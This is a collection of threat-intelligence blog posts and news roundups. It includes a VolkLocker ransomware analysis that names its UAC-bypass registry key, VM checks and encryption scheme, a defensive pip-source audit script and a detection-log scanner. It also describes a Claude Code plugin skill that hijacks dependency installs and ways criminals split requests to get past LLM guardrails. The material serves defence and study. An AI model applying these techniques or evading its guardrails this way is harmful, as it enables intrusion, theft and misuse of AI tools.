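    """Yield (host, event_id, sorted rule names) for each record with a hit."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        hits = flag_text(rec["text"])
        if hits:
            findings.append((rec["host"], rec["event_id"], sorted(hits)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The benign `ping` and `RemoteSigned` records produce no findings, which is the false-positive case the host-binary check exists for.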

November

As part of our efforts to empower the community at large through research and adversary exposure, SentinelLABS also develops and releases open source tooling. In November, we released a Synapse Rapid Power Up for Validin to improve campaign discovery at scale. Our research showed how modern intelligence platforms could accelerate identification of threat campaigns through infrastructure correlation and automated discovery techniques.

Using the LaundryBear and FreeDrain campaigns as case studies, we explored how the sentinelone-validin power-up leverages Validin’s multi-source enrichment and HTTP fingerprinting to reveal wider campaign infrastructure within Synapse from just a handful of indicators.

The tool makes it easier to follow how infrastructure changes over time, trace shared resources across campaigns, and connect what might first appear as isolated indicators. With this richer context available directly in Synapse, analysts can move from collection to understanding with greater speed and confidence in their conclusions.

Key Takeaway: Modern adversaries rotate domains and replicate infrastructure templates, which can limit the value of isolated indicators. Analysts need time-aware, cross-source analysis to identify shared traits and connect related assets.

December

Early in December, SentinelLABS released its forward-looking “Cybersecurity 2026” forecast, examining the year ahead in AI, adversaries, and global change. The analysis drew on trends observed throughout 2025 to project how the threat landscape would continue evolving.

This month we also traced how two hackers progressed from Cisco Academy students to orchestrating Salt Typhoon attacks, providing rare insight into how technical education can be perverted toward malicious ends and highlighting the danger of threat actors emerging from legitimate training programs.

December also saw reporting on CyberVolk’s return with VolkLocker. The pro-Russian hacktivist collective continued its pattern of reusing, tweaking, and rebranding leaked ransomware source code.

The year concluded with comprehensive research on how large language models impact ransomware operations. The analysis found that while LLMs are being adopted by crimeware actors, they serve as operational accelerators rather than revolutionary tools, streamlining reconnaissance, improving phishing, and speeding up attack stages without fundamentally changing ransomware methodology.

Key Takeaway: With today’s LLMs, the risk is not superintelligent malware but industrialized extortion, requiring defenders to adapt to faster operational tempo rather than novel capabilities.

Conclusion

2025 saw the cybersecurity landscape defined not by revolutionary changes but by the acceleration of existing threats. AI has emerged not as a game-changer but as a force multiplier, amplifying attacks across the spectrum.

Meanwhile, cybercriminals operate industrial-scale operations with professional infrastructure, business hours, and customer service models much like legitimate enterprises, and nation-state actors monitor the same intelligence platforms defenders use, turning the information security community’s own tools into reconnaissance resources.

Our research over the last 12 months has also found an adversary landscape in which attribution has become increasingly complex, and the line between hacktivist and profit-motivated operations continues to blur. From the 38,000 phishing subdomains of FreeDrain to the coordinated teams behind Contagious Interview monitoring threat intelligence platforms, threat actors have shown both adaptability and operational maturity.

SentinelLABS’ discoveries throughout 2025 underscore the critical need for a collaborative, intelligence-driven approach to cybersecurity. As we move into 2026, defenders will find themselves in an environment where trust models require reevaluation, adversaries demonstrate sophisticated awareness of defensive operations, and the weaponization of legitimate services demands new detection paradigms.


When Your AI Coding Plugin Starts Picking Your Dependencies: Marketplace Skills and Dependency Hijack in Claude Code

AI coding assistants are no longer just autocompleting lines of code; they are quietly making decisions for you. Tools like Claude Code are able to read projects, plan multi-step changes, install dependencies, and modify files with minimal human oversight. To make this possible, these assistants rely on plugin marketplaces, where third-party developers can enable ‘skills’ that teach the agent how to manage infrastructure, testing, and dependencies. Though powerful, the model requires a high degree of trust, thus bringing with it a new set of risks.

At first glance, third-party marketplace plugins are harmless productivity boosters. Connect a marketplace and enable a plugin so your coding assistant becomes smarter about your stack. However, beneath the convenience is a security blind spot: these same skills often run with extremely high privilege and very little transparency on how they make decisions or where the code and dependencies are coming from. The core issue isn’t prompt manipulation or social engineering – it’s compromised automation.

A full technical blog post by SentinelOne’s own Prompt Security team breaks down how a single benign-looking plugin from an unofficial marketplace exposes a dependency management skill. When the developer asks the agent to install a common Python library, that skill quietly redirects the install to an attacker-controlled source, ensuring a trojanized version of the library is pulled into the project. While nothing looks wrong – the library imports cleanly, the example code runs without error – malicious code is now embedded into the environment, capable of exfiltrating secrets, monitoring traffic, or lying dormant until it is triggered at a later time.

What makes this especially concerning is persistence. Marketplace plugins are not one-off interactions. Once enabled, their skills remain available across sessions and will continue to shape how the agent behaves in the future. Rather than a ‘bad prompt’, this effect is more like compromising your package manager itself.

As AI-driven development workflows accelerate, plugin marketplaces and third-party skills are now part of the software supply chain whether teams realize it or not. If your coding assistant can fetch and execute code on your behalf, every plugin installed joins your trust boundary.
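One way to keep an agent-proposed install inside that trust boundary is to audit the command before it runs. The check below is an added example, not code from Prompt Security or Claude Code. The page does not say how the skill performs the redirect, so this covers the pip options and environment variables that change where packages come from; the allowlist, package names and the host `pkgs.untrusted.example` are constructed assumptions.

```python
import re
import shlex
from urllib.parse import urlparse

# Assumption: the organisation only permits the public PyPI hosts.
ALLOWED_HOSTS = {"pypi.org", "files.pythonhosted.org"}

# pip options, and their environment-variable forms, that change package sources.
SOURCE_OPTS = {
    "-i": "index", "--index-url": "index",
    "--extra-index-url": "extra-index",
    "-f": "find-links", "--find-links": "find-links",
}
SOURCE_ENV = {
    "PIP_INDEX_URL": "index",
    "PIP_EXTRA_INDEX_URL": "extra-index",
    "PIP_FIND_LINKS": "find-links",
}
URL_RE = re.compile(r"[a-z][a-z0-9+.\-]*://\S+", re.IGNORECASE)


def _check(kind, source, findings):
    """Record a finding unless the source resolves to an allowlisted host."""
    host = (urlparse(source).hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        # A local path (find-links directory) has no host; report it as-is.
        findings.append((kind, host or source))


def audit_pip_install(command, env=None):
    """Return (kind, host) findings for every non-allowlisted package source
    in a pip install command line and the environment it would run with."""
    findings = []
    env = env or {}
    for var, kind in SOURCE_ENV.items():
        # Multi-value pip settings are space separated in the environment.
        for source in env.get(var, "").split():
            _check(kind, source, findings)
    for host in env.get("PIP_TRUSTED_HOST", "").split():
        findings.append(("trusted-host", host))

    toks = shlex.split(command)
    if "install" not in toks:
        return findings
    args = iter(toks[toks.index("install") + 1:])
    for tok in args:
        opt, _, inline = tok.partition("=")
        if opt in SOURCE_OPTS:
            # Accept both "--index-url URL" and "--index-url=URL".
            _check(SOURCE_OPTS[opt], inline or next(args, ""), findings)
        elif opt == "--trusted-host":
            # pip will accept this host without valid HTTPS: always report it.
            findings.append(("trusted-host", inline or next(args, "")))
        elif not tok.startswith("-"):
            # Direct reference: "name @ URL", a bare URL, or a VCS URL.
            match = URL_RE.search(tok)
            if match:
                _check("direct-url", match.group(0), findings)
    return findings


if __name__ == "__main__":
    # Constructed commands of the kind an agent might propose.
    samples = [
        ("pip install requests", {}),
        ("pip install --index-url https://pkgs.untrusted.example/simple requests", {}),
        ("python -m pip install httpx "
         "--extra-index-url=https://pkgs.untrusted.example/simple "
         "--trusted-host pkgs.untrusted.example", {}),
        ('pip install "requests @ https://pkgs.untrusted.example/'
         'requests-2.32.0-py3-none-any.whl"', {}),
        ("pip install requests",
         {"PIP_INDEX_URL": "https://pkgs.untrusted.example/simple"}),
    ]
    for cmd, env in samples:
        print(audit_pip_install(cmd, env) or "ok", "<-", cmd)
```

An empty result means every source resolved to the allowlist; it says nothing about whether the package on that index is itself trustworthy, which is what hash-pinned requirements are for.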

Read the full blog post here for a detailed walkthrough of the attack mechanics and learn why dependency skills are such a powerful, but under-modeled, risk.

Third-Party Trademark Disclaimer:

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

The Good, the Bad and the Ugly in Cybersecurity – Week 1

The Good | Authorities Crack Down on BlackCat and Coinbase Malicious Insiders & Malware Operators

Two former employees from Sygnia and DigitalMint have pleaded guilty to participating in ransomware attacks linked to the BlackCat (ALPHV, AlphaVM) operation. Ryan Goldberg and Kevin Martin admitted to conspiring to extort U.S. organizations, abusing the same security expertise they once used to defend cyber victims. Working with a third accomplice, they breached multiple companies nationwide and shared roughly 20% of ransom proceeds for access to BlackCat’s infrastructure. Prosecutors say they demanded between $300,000 and $10 million per victim.

Alongside insider risk at the highest technical levels, similar threats are emerging from much lower in the access chain. Indian authorities arrested a former customer support agent for aiding threat actors in the May data breach at Coinbase, a popular crypto exchange, with more arrests expected. The incident exposed data from roughly 69,500 users after bribed staff at outsourcing partner TaskUs enabled access. This news follows charges against Ronald Spektor, accused of stealing $16 million by impersonating Coinbase, highlighting ongoing insider and social engineering risks.

We have zero tolerance for bad behavior and will continue to work with law enforcement to bring bad actors to justice.

Thanks to the Hyderabad Police in India, an ex-Coinbase customer service agent was just arrested. Another one down and more still to come.

— Brian Armstrong (@brian_armstrong) December 26, 2025

Beyond insider abuse, attackers are also exploiting everyday user behavior to siphon funds at massive scale. A Lithuanian national was arrested for allegedly infecting 2.8 million systems with clipboard-stealing malware disguised as KMSAuto, an illegal Windows and Office software activator. The suspect used clipper malware to swap cryptocurrency addresses and divert funds to attacker-controlled ones. The Korean National Police Agency says the campaign ran from 2020 to 2023, with a total of KRW 1.7 billion ($1.2M) stolen across thousands of transactions. Authorities warn that pirated software is often a key component in how attackers spread malware.

The Bad | Chinese-Based Attackers Deploy Stealthy Kernel‑Mode ‘ToneShell’ Backdoor

Security researchers have uncovered a significantly more stealthy variant of the ToneShell backdoor, a tool long associated with Chinese state-sponsored cyberespionage activity, now delivered via a kernel‑mode loader for the first time. New analysis links the campaign to G0129 (aka Bronze President, TEMP.Hex, Hive0154), a threat actor known for targeting government agencies, NGOs, and think tanks.

The activity, observed since at least February, primarily targets government organizations across Asia, particularly in Myanmar and Thailand. Investigators have found evidence that some victims had previously been compromised by earlier ToneShell variants, PlugX malware, or the ToneDisk USB worm, indicating long‑term persistence across multiple intrusion waves.

What sets this campaign apart is its use of a malicious kernel-mode mini-filter driver, ProjectConfiguration.sys, signed with a stolen or leaked digital certificate originally issued to Guangzhou Kingteller Technology Co., Ltd and valid from 2012 to 2015. Operating deep within the Windows kernel, the driver acts as a rootkit: evading static analysis by resolving kernel APIs at runtime, blocking file deletion and registry access, protecting injected processes, and deliberately interfering with Microsoft Defender by manipulating the WdFilter driver’s load order.

The driver ultimately injects two user-mode payloads, including the updated ToneShell backdoor, which now features enhanced stealth capabilities. Changes also include a simplified host-ID scheme, network traffic obfuscation using fake TLS headers, and remote administration capabilities such as file transfer and interactive shell access. Communication occurs over TCP port 443 to attacker-controlled infrastructure.

ToneShell injection workflow (Source: Securelist)

Researchers note this marks a clear evolution in G0129’s tactics, prioritizing kernel‑level persistence and evasion. As the payload operates almost entirely in memory, memory forensics becomes a critical detection method, alongside monitoring for indicators of compromise tied to the malicious driver and injected shellcode.

The Ugly | Hackers Steal $7M via Compromised Trust Wallet Chrome Extension

After a compromised update to the Trust Wallet Chrome extension went live over the holidays, approximately $7 million has been stolen from nearly 3,000 cryptocurrency wallets. The malicious version 2.68.0 contained a hidden JavaScript file called 4482.js that silently exfiltrated sensitive wallet data, including seed phrases, to an external server, api.metrics-trustwallet[.]com. Users immediately reported funds disappearing after simple wallet authorizations, prompting Trust Wallet to investigate and release a patched version 2.69. CEO Eowyn Chen confirmed the hack and assured users that the company would reimburse affected wallets.

Investigations indicate that attackers likely exploited a leaked Chrome Web Store API key to publish the malicious extension, bypassing Trust Wallet’s standard release procedures. In parallel, threat actors launched a phishing campaign using a Trust Wallet-branded site, fix-trustwallet[.]com, claiming to provide a “vulnerability fix”. Users who entered their seed phrases on the site immediately lost access to their wallets. WHOIS records suggest the phishing domain may be linked to the same actors behind the malicious extension.

Phishing site asking for wallet seed phrases (Source: BleepingComputer)

Trust Wallet, a non-custodial cryptocurrency wallet acquired by Binance in 2018, emphasized that mobile-only users and other browser extension versions were not affected. The company has begun reimbursing victims after verifying wallet ownership, transaction hashes, and affected addresses, while warning users not to share private keys or seed phrases.

Security researchers noted the incident highlights significant risks in browser-based wallets and supply chain attacks, as malicious updates can gain privileged access to funds. Trust Wallet has suspended compromised API keys, reported the malicious domains to registrars, and continues monitoring for scams. Users are strongly advised to immediately update to version 2.69, only use official channels, and verify all communications to protect their crypto assets.

The Best, the Worst and the Ugliest in Cybersecurity | 2025 Edition

It’s that time of year where we re-visit the wins and challenges from 2025 in our special year-end edition of The Good, The Bad and the Ugly. Here are the biggest stories that defined the best, the worst, and the ugliest cybersecurity moments from this past year.

The Best

2025 has been a year of remarkable victories for law enforcement agencies worldwide, highlighting the power of cross-border coordination. From high-profile arrests to major asset seizures, authorities have steadily dismantled the infrastructure supporting criminal and state-aligned cyber actors.

In the last two weeks, Eurojust led a takedown of Ukrainian call centers defrauding Europeans of €10M, and law enforcement seized servers from the E-Note crypto exchange, which was used to launder $70M tied to ransomware and account takeovers. Similarly, the arrest of Ukrainian national Victoria Dubranova for aiding Russian state-backed hacktivists, alongside Spanish authorities capturing a 19-year-old selling 64M stolen records, underscores the growing international effort to hold cybercriminals accountable.

Significant infrastructure disruptions further amplify these successes. Convictions of cybercriminals targeting sensitive systems, such as the prison sentence for the “evil twin” WiFi hacker and seizure of the Cryptomixer crypto mixer with €1.3B laundered since 2016, are tangible results in stopping large-scale fraud. Law enforcement groups also took on multifaceted approaches, combining legal action, sanctions, and operational disruption to arrest Russian and DPRK-related cybercriminals and place sanctions on bulletproof hosting providers and foreign actors.

Our 🆕 joint guidance on bulletproof hosting providers highlights best practices to mitigate potential cybercriminal activity, including recommended actions that ISPs can implement to decrease the usefulness of BPH infrastructure. Learn more 👉 https://t.co/cGQpuLpBPP pic.twitter.com/tM55acfuQv

— CISA Cyber (@CISACyber) November 19, 2025

International coordination has also been key this year. Interpol’s massive operations across Africa, including Operation Serengeti 2.0 and Operation Red Card, led to the arrests of thousands of suspects and the seizure of tens of millions in stolen assets. Europol dismantled SIMCARTEL, a global SIM-box fraud network, seizing servers, SIM cards, crypto, and luxury vehicles, while coordinated actions targeted Diskstation ransomware gangs and hacktivist infrastructures. In parallel, DOJ and CISA-led operations disrupted high-value schemes, including Prince Group’s $15B romance scam and multiple ransomware networks, while releasing decryptors for Phobos and 8Base victims to provide tangible relief. Law enforcement also extended its reach to regulatory and infrastructure initiatives, introducing the Cyber Trust Mark certification for IoT devices and HIPAA encryption and MFA updates to ensure cyber safety from the top down.

Source: Group-IB

On the cybersecurity innovation front, CISA’s launch of Thorium, an open-source platform to help government agencies automate forensic investigations, and AI-enabled threat detection systems have allowed authorities to act on incidents more rapidly, from ransomware affiliate seizures to monitoring AI misuse.

The Worst

State-sponsored crime, supply chain abuse, and emerging malware strains have collectively challenged defenders worldwide.

DPRK-linked hackers were prolific throughout 2025, stealing over $2B in cryptocurrency and blending traditional heists with espionage campaigns like Operation Contagious Interview targeting remote workers. Similarly, Iranian-linked UNK_SmudgedSerpent and China-linked TA415 campaigns leveraged phishing, fake platforms, and developer tooling to compromise high-value targets, from policy experts to enterprise networks.

2025 saw developer platforms, open-source ecosystems, and smart contracts become prime targets for threat actors. VS Code extensions like Bitcoin Black and Codo AI exfiltrated credentials from crypto wallets, while NPM packages such as XORIndex and os-info-checker-es6 delivered multi-stage payloads. Novel malware families including SleepyDuck RAT and Betruger backdoors emerged, masquerading as popular extensions on the Open VSX open-source registry and supporting ransomware campaigns, respectively. Even AI-powered attacks emerged, with AkiraBot, Gamma AI phishing, and social engineering campaigns bypassing CAPTCHAs and traditional defenses to exploit SMBs and enterprise targets.

This year, financial and operational impacts were particularly severe. Holiday banking fraud alone netted $262M via account takeovers exploiting phishing, MFA bypasses, and impersonation. YouTube trading bot scams, cloud identity theft campaigns, and multi-stage ransomware attacks like EncryptHub and Katz Stealer drained millions, targeting both enterprise systems and individuals. Exploits in misconfigured cloud resources and abandoned subdomains further amplified these risks, showing how minor misconfigurations can fuel sophisticated attacks.

State-aligned and nation-state threat actors also pursued espionage alongside financial crime. Fake job schemes and AI/crypto talent lures enabled targeted malware deployment, while advanced persistent threats like UNC3886 delivered stealthy backdoors to corporate and diplomatic networks. Malicious actors increasingly weaponized cloud services, messaging platforms, and developer tools, blurring the line between operational convenience and attack vectors.

Error message with ClickFix message (Source: Validin)

The Ugliest

The “Ugly” dimension of 2025 was defined by AI-assisted attacks, zero-day exploitation, and ransomware industrialization, which amplified the scale and complexity of cybercrime. Large ransomware operations like CyberVolk resurfaced with AI-driven VolkLocker, automating negotiation, phishing, and multilingual attacks while leveraging Telegram for orchestration. AI also enhanced the capabilities of smaller, fragmented ransomware crews, allowing rapid targeting and payload deployment, though operational flaws sometimes limited effectiveness.

Zero-day vulnerabilities were actively exploited across critical infrastructure and enterprise platforms. React2Shell in React/Next.js, Triofox (CVE-2025-12480), Oracle E-Business Suite (CVE-2025-61884), and ToolShell in SharePoint permitted full system compromise, highlighting that popular frameworks and business-critical software remain high-value targets. Cloud and AI services were similarly exploited; EchoLeak and Google Gemini LLM prompt injections enabled exfiltration of sensitive information without user interaction. Attackers in all these cases demonstrated a capacity to combine stealth, automation, and sophisticated payloads for maximum disruption.

Update: See newly added info to our #ToolShell Alert. We’ve included info on ransomware deployment, new webshells involved in exploitation, & detection guidance 👉 https://t.co/Y37FHSeAL0 pic.twitter.com/C5aMXNOmAU

— CISA Cyber (@CISACyber) July 24, 2025

2025 also saw cyber espionage intertwined with physical and geopolitical threats. Iranian-backed Crimson Sandstorm leveraged cyber reconnaissance to support missile strikes, while Chinese and DPRK actors continue to target aid operations, humanitarian NGOs, and government infrastructure, often exploiting IoT, industrial control systems, or open-source software to do so. In cross-border campaigns, long-dwell malware like BRICKSTORM and protocol-level exploits such as MadeYouReset created cascading impacts across critical networks and infrastructure.

PhantomCaptcha infection paths

Risk in many attacks this year was amplified by third-party exposure. Breaches of Discord vendors, Mixpanel, and GitHub Actions exposed vast quantities of PII and credentials, enabling subsequent ransomware, phishing, or espionage campaigns. The combination of AI, automation, and high-impact vulnerabilities exemplifies a cybercrime industrial complex, where opportunistic and state-aligned actors scale operations with unprecedented speed and sophistication.

Conclusion

As 2025 draws to a close, one thing is clear: Cybersecurity has become more interconnected, more consequential, and more dependent on collective responsibility than ever before. From supply chain fragility and identity-based intrusion to the continued convergence of cybercrime and geopolitics, the challenges ahead demand deeper collaboration, stronger accountability, and a more deliberate approach to trust across the digital ecosystem.

From all of us here at SentinelOne, we wish you a happy, healthy, and secure New Year 2026!

The Good, the Bad and the Ugly in Cybersecurity – Week 51

The Good | Authorities Dismantle Global Fraud Ring and Crypto Laundering Network

Eurojust officials have dismantled a transnational fraud ring running call centers in Ukraine that scammed European victims out of more than €10 million.

In collaboration with authorities from the Czech Republic, Latvia, Lithuania, and Ukraine, police arrested 12 suspects and conducted 72 searches across three Ukrainian cities, seizing vehicles, weapons, cash, computers, a polygraph machine, and forged IDs.

The network operated multiple call centers employing around 100 people and targeted more than 400 known victims. Scammers impersonated bank employees and police, claimed accounts were compromised, and coerced victims into transferring funds to “safe” accounts. Others used remote access software to steal credentials or collect cash in person.

Further seizures this week targeted the E-Note cryptocurrency exchange, dismantling its servers and domains after determining the service was used to launder more than $70 million in illicit funds. According to the DoJ, the proceeds stemmed largely from ransomware operations and account takeover attacks, routed through a global network of money mules.

The takedown was led by the FBI with support from German and Finnish authorities and Michigan State Police, with investigators confiscating multiple domains, mobile applications, backend servers, and customer databases containing transaction records.

Prosecutors have also unsealed an indictment against alleged operator Mykhalio Petrovich Chudnovets and are charging him with money laundering conspiracy. While no arrests have been made, Chudnovets faces up to 20 years in prison. Authorities say seized records may support further identifications and follow-on enforcement actions.

The Bad | North Korean Hackers Drive Record $2B Crypto Theft Surge in 2025

DPRK-linked threat actors drove a record surge in global cryptocurrency theft this year, claiming at least $2.02 billion of the $3.4 billion+ stolen worldwide between January and early December.

A new report delves into the 51% year-over-year increase, which marks the most severe year on record for DPRK-linked crypto crime while accounting for roughly 76% of all service compromises. Cumulatively, North Korean actors are now estimated to have stolen at least $6.75 billion in cryptocurrency.

DPRK hack activities graph, 2016-2025 (Source: Chainalysis)

A single incident, attributed to the TraderTraitor cluster, dominated the year: the February breach of Bybit that resulted in losses of approximately $1.5 billion. Beyond Bybit, DPRK-linked actors are also suspected in the theft of $36 million from South Korea’s most popular cryptocurrency exchange, Upbit.

These operations roll up into what is widely referred to as the Lazarus Group, a long-running threat actor tied to Pyongyang’s Reconnaissance General Bureau (RGB), which has historically blended large-scale crypto heists with espionage campaigns such as Contagious Interview, a campaign using fake recruitment-themed lures to deliver malware and harvest job applicants’ data.

In recent years, these state-backed actors have expanded tactics to include covert IT worker infiltration, sometimes via front companies, to gain privileged access at exchanges and Web3 firms – all to fund the regime despite international sanctions.

The growing scale of DPRK-linked crypto theft shows the profitability of high-value, state-backed operations, also incentivizing other actors to adopt similar tactics, including advanced laundering schemes, affiliate-based attacks, and cross-border exploitation.

For the broader ecosystem, North Korean threat operations continue to both normalize large-scale crypto heists and accelerate the professionalization of illicit networks, complicating attribution and straining global law enforcement resources.

The Ugly | Threat Actors Upscaling Abilities with Widespread Adoption of LLMs

Ransomware operations are undergoing a rapid, dangerous transformation not through novel “super-hacks” but via the industrialized efficiency of Large Language Models (LLMs). A new report by SentinelLABS assesses that LLMs have become a critical operational accelerator, compressing the ransomware lifecycle and dramatically lowering the barrier to entry for novice cybercriminals.

The researchers say that threat actors are now automating reconnaissance, generating localized phishing lures, and triaging massive datasets across language barriers with unprecedented speed and accuracy with the help of LLMs. Ransomware-as-a-Service operators are already claiming to offer AI-assisted tools to affiliates to increase attack productivity.

Global RaaS offering AI-Assisted Chat

SentinelLABS says attackers are successfully evading commercial guardrails through “prompt smuggling”, a process by which malicious requests are broken down into innocent-looking pieces across multiple chats. The outputs are then stitched together offline to build working attack tools.

The researchers predict that top-tier actors will go further, likely migrating to self-hosted, open-source models like Ollama to entirely avoid provider guardrails. This evolution would allow criminals to operate without telemetry or censorship, effectively weaponizing unrestricted AI.

Real-world campaigns already illustrate this escalation. Anthropic has reported on tools like Claude Code being used to automate entire extortion chains, from technical reconnaissance to calculating optimal ransom demands. In other instances, malware such as QUIETVAULT has been seen hijacking a victim’s own locally installed LLMs to intelligently hunt for crypto-wallets and sensitive files.

While the report adds to the general industry concern around the use of AI by threat actors, it also debunks one of the wider myths in common circulation. The risk from today’s LLMs, the researchers say, isn’t superintelligent malware or novel attack vectors; it’s the more mundane industrialization of extortion with smarter target selection, tailored demands, and faster operational tempo. These factors increasingly complicate attribution and challenge defenders to adapt to a significantly higher-volume threat landscape.

The Good, the Bad and the Ugly in Cybersecurity – Week 50

The Good | U.S. & Spanish Officials Crack Down on Hacktivist & Identity Theft Activities

U.S. officials have charged Ukrainian national Victoria Dubranova for allegedly supporting Russian state-backed hacktivist groups in global critical infrastructure attacks. Extradited earlier this year, Dubranova faces trials in February and April 2026 tied to her suspected involvement in NoName057(16) and CyberArmyofRussia_Reborn (CARR), respectively.

GOT HER: A pro-Russian UKR hacker, Victoria Dubranova, has been arrested in a MASSIVE 99-count indictment for GRU-backed attacks on US water systems and food plants. She’s been extradited — and now there’s a $10M bounty on her GRU bosses! https://t.co/i31z4aXPMF pic.twitter.com/AAKeGQWx0K

— Chuck Pfarrer | Indications & Warnings | (@ChuckPfarrer) December 12, 2025

The indictment states that NoName057(16) operated as a state-sanctioned effort involving multiple threat actors and a government-created IT center. Their tooling includes a custom DDoS tool called ‘DDoSia’, used to launch attacks against government and financial agencies as well as critical transportation.

Prosecutors say Russia’s military intelligence service funded and directed CARR, a hacktivist group with over 75,000 Telegram followers and a long record of attacks. Damage to U.S. water systems, an ammonia leak at a Los Angeles facility, and targeting of nuclear and election infrastructure are all attributed to CARR. Dubranova faces up to 27 years on CARR-related charges and 5 years on NoName charges. Multi-million dollar rewards are in place for information on either threat group.

In Spain, authorities have arrested a 19-year-old hacker for the alleged theft and sale of 64 million records stolen from nine organizations. The suspect faces charges including cybercrime, unauthorized access, and privacy violations.

The investigation first started in June after breaches at the unnamed firms were reported. Police later confirmed that the suspect possessed millions of stolen records containing full names, addresses, emails, phone numbers, DNI numbers, and IBAN codes. He reportedly tried to sell the data on multiple forums using six accounts and five pseudonyms.

While officers have seized cryptocurrency wallets containing proceeds from the alleged sales, the total number of individuals affected remains unclear. Given the scale of the crime, Spanish authorities emphasize the seriousness of attempting to monetize stolen personal information.

The Bad | Malicious VS Code Extensions Deploy Stealthy Infostealer Malware

Two malicious Visual Studio Code extensions, Bitcoin Black and Codo AI, were recently discovered on Microsoft’s VS Code Marketplace, infecting developers with information-stealing malware. Disguised as a harmless color theme and an AI coding assistant respectively, the extensions were published under the alias ‘BigBlack’. While download counts are still low at the time of this writing, both packages point to a clear intent to compromise developer environments.

Researchers note that earlier versions of Bitcoin Black used a PowerShell script to fetch a password-protected payload, briefly flashing a visible window that could alert users. The latest version now has a hidden batch script that quietly downloads a DLL and executable via curl, significantly reducing detection risk. Meanwhile, Codo AI delivers legitimate code-completion via ChatGPT or DeepSeek but embeds a malicious payload alongside these features.

Both extensions deploy the Lightshot screenshot tool paired with a malicious DLL that uses DLL hijacking to load an infostealer called runtime.exe. Once executed, the malware creates a directory under %APPDATA%\Local\ and begins exfiltrating sensitive data from system details and clipboard content to WiFi passwords, screenshots, installed software lists, and running processes. Finally, it launches Chrome and Edge in headless mode to extract cookies and hijack active sessions, targeting several crypto wallets including Phantom, MetaMask, and Exodus.

VirusTotal report for Lightshot.dll (Source: Koi.ai)

Microsoft has since removed both extensions from the Marketplace and the malicious DLL is already flagged by 29 of 72 antivirus engines on VirusTotal. Developers are advised to install extensions only from trusted publishers and stay alert to atypical extension behavior.

The Ugly | CyberVolk Resurfaces With New Telegram-Powered RaaS ‘VolkLocker’

CyberVolk, a pro-Russia hacktivist persona first identified in late 2024, resurfaced this August with a revamped ransomware-as-a-service (RaaS) offering known as VolkLocker (CyberVolk 2.x). SentinelLABS reported this week that the group has pivoted to using Telegram for both automation and customer interaction; however, operations are being undercut by payloads that retain artifacts, allowing victims to recover their files.

VolkLocker is written in Golang and supports both Windows and Linux. Payloads are distributed largely unprotected, with RaaS operators instructed to use UPX for packing. Builders must supply key configuration values including a Bitcoin address, Telegram bot token ID, encryption deadline, file extension, and more.

On execution, the ransomware attempts privilege escalation via the “ms-settings” UAC bypass, performs system and VM checks, and enumerates drives for encryption. A dynamic HTML ransom note then displays a 48-hour countdown, while a separate enforcement timer corrupts the system if the deadline passes or decryption attempts fail.

Telegram serves as the backbone of the RaaS, offering operators an administrative panel, victim enumeration, broadcast messaging, and optional extensions such as RAT and keylogger control. Recent ads show CyberVolk expanding into standalone tooling with tiered pricing models.

Decryption triggered via backed-up key file

The encryption routine uses AES-256 in GCM mode with a hardcoded master key. Crucially, the key is written in plaintext to a file in %TEMP%, alongside the victim’s unique identifier and the attacker’s Bitcoin address – an apparent leftover test artifact that allows victims to decrypt their own files.

Despite repeated account bans on Telegram, CyberVolk continues to evolve its services. The plaintext key flaw, however, reveals quality-control issues that limit the real-world impact of VolkLocker as-is. SentinelOne’s Singularity Platform detects and blocks behaviors and payloads linked to CyberVolk.

CyberVolk Returns | Flawed VolkLocker Brings New Features With Growing Pains

CyberVolk is a pro-Russia hacktivist persona we first documented in late 2024, tracking its use of multiple ransomware tools to conduct attacks aligned with Russian government interests. After seemingly lying dormant for most of 2025 due to Telegram enforcement actions, the group returned in August with a new RaaS offering called VolkLocker (aka CyberVolk 2.x).

In this post, we examine the functionality of VolkLocker, including its Telegram-based automation, encryption mechanisms, and affiliate features. Our analysis reveals an operation struggling with the challenges of expansion: taking one step forward with sophisticated Telegram automation, and one step backward with payloads that retain test artifacts enabling victim self-recovery.

Technical Details

VolkLocker payloads are written in Golang, with versions supporting both Linux and Windows. Base builds are shipped without obfuscation, and RaaS operators are encouraged to use UPX for packing rather than being offered native crypting or packing features as is common with many other RaaS offerings.

Operators building new VolkLocker payloads must provide a bitcoin address, Telegram bot token ID, Telegram chat ID, encryption deadline, desired file extension, and self-destruct options.

Required options for CyberVolk builds

Upon launch, the ransomware checks its execution context and attempts privilege escalation if needed. Escalation uses the “ms-settings” UAC bypass technique (T1548.002), hijacking the HKCU\Software\Classes\ms-settings\shell\open\command registry key to execute with elevated privileges.

UAC Bypass pseudocode for CyberVolk’s Ransomware

The malware performs environmental discovery and system enumeration, including process enumeration for virtual environment detection and hardware-based identification.

VM sandbox detection in CyberVolk’s Ransomware

VolkLocker checks the local MAC address against known virtualization vendor prefixes. Registry locations associated with VirtualBox and VMware are also queried.

| MAC Prefix | Vendor |
|---|---|
| 00:05:69 | VMware, Inc. |
| 00:0C:29 | VMware, Inc. |
| 00:1C:14 | VMware, Inc. |
| 00:50:56 | VMware, Inc. |
| 08:00:27 | Oracle Corporation (VirtualBox) |
| 0A:00:27 | Oracle Corporation (VirtualBox) |

VM Detection in CyberVolk

Once initialized, the ransomware enumerates all available drives (A: through Z:) and determines which files to encrypt based on exclusion lists for specific paths and extensions configured in the VolkLocker code.

Exclude Paths and Extensions in VolkLocker

Encryption Mechanism

VolkLocker uses AES-256 in GCM mode (Galois/Counter Mode) for file encryption. When the ransomware identifies a target file, it initializes an encryption engine using a 32-byte master key decoded from a 64-character hex string embedded in the binary.

For each file, the malware generates a random 12-byte nonce for the initialization vector using Golang’s crypto/rand package. The file is encrypted using the GCM Seal operation, which prepends the 12-byte nonce to the ciphertext and appends a 16-byte authentication tag. The original file is marked for deletion, and the encrypted file receives a custom extension (e.g., .locked, .cvolk).

Critical Design Flaw | Plaintext Key Backup

VolkLocker does not generate encryption keys dynamically. Instead, master keys are hardcoded as hex strings within the binaries. The same master key encrypts all files on a victim system.

Critically, this master key is also written to a plaintext file in the %TEMP% folder, creating a trivial decryption pathway for victims who discover it.

This design flaw exists in the backupMasterKey() function, which executes during initialization and performs the following:

  • Constructs a file path at %TEMP%\system_backup.key (typically C:\Users\<username>\AppData\Local\Temp\system_backup.key)
